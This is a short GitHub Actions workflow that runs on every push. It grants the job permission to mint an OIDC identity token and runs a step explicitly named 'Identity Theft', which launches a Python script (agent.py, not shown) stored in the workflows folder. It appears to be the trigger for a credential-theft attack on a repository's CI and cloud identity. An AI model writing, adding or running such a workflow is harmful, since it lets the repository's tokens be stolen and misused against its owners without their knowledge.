name: void_engine
on:
  push:
  workflow_dispatch:
permissions:
  id-token: write # CRITICAL: This grants the runner the permission to generate a token
jobs:
  execute:
    runs-on: ubuntu-latest
    steps:
      - name: Identity Theft
        run: |
          python3 .github/workflows/agent.py
          sleep 60
